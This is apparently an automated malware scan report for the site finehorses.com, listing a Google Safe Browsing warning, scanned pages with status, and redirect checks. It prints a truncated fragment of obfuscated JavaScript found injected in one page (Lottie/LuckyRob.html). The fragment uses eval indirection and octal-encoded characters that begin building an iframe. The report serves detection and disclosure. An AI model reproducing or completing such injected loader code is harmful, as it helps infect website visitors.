Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=finehorses.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://finehorses.com/ | 200 OK Content-Length: 10023 Content-Type: text/html | clean |
http://finehorses.com/Map.html | 200 OK Content-Length: 1010 Content-Type: text/html | clean |
http://finehorses.com/test404page.js | 404 Not Found Content-Length: 411 Content-Type: text/html | clean |
http://finehorses.com/sugar.html | 200 OK Content-Length: 3013 Content-Type: text/html | clean |
http://finehorses.com/freckles.html | 200 OK Content-Length: 2931 Content-Type: text/html | clean |
http://finehorses.com/mahya.html | 200 OK Content-Length: 2079 Content-Type: text/html | clean |
http://finehorses.com/roper.html | 200 OK Content-Length: 2243 Content-Type: text/html | clean |
http://finehorses.com/sold.html | 200 OK Content-Length: 1118 Content-Type: text/html | clean |
http://finehorses.com/penem.jpg | 200 OK Content-Length: 103666 Content-Type: image/jpeg | clean |
http://finehorses.com/Lottie/LuckyRob.html | 200 OK Content-Length: 5274 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0167,0143,0147,0146,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162, Antivirus reports:
| ||
http://finehorses.com/suntime.jpg | 200 OK Content-Length: 88413 Content-Type: image/jpeg | clean |
http://finehorses.com/Stkhrs.html | 200 OK Content-Length: 2331 Content-Type: text/html | clean |
http://finehorses.com/cedarbrook.net/index.html | 200 OK Content-Length: 3261 Content-Type: text/html | clean |
http://finehorses.com/cedarbrook.net/Stakebdy/stake.html | 404 Not Found Content-Length: 431 Content-Type: text/html | clean |
http://finehorses.com/cedarbrook.net/Map.html | 200 OK Content-Length: 1008 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: finehorses.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 21:11:06 GMT
Accept-Ranges: bytes
ETag: "ad431c0-2727-4d82a173e09d4"
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 10023
Content-Type: text/html
Last-Modified: Mon, 18 Mar 2013 02:53:17 GMT
...10023 bytes of data.
GET / HTTP/1.1
Host: finehorses.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 21:11:06 GMT
Accept-Ranges: bytes
ETag: "ad431c0-2727-4d82a173e09d4"
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 10023
Content-Type: text/html
Last-Modified: Mon, 18 Mar 2013 02:53:17 GMT
...10023 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: finehorses.com
Referer: http://www.google.com/search?q=finehorses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: finehorses.com
Referer: http://www.google.com/search?q=finehorses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.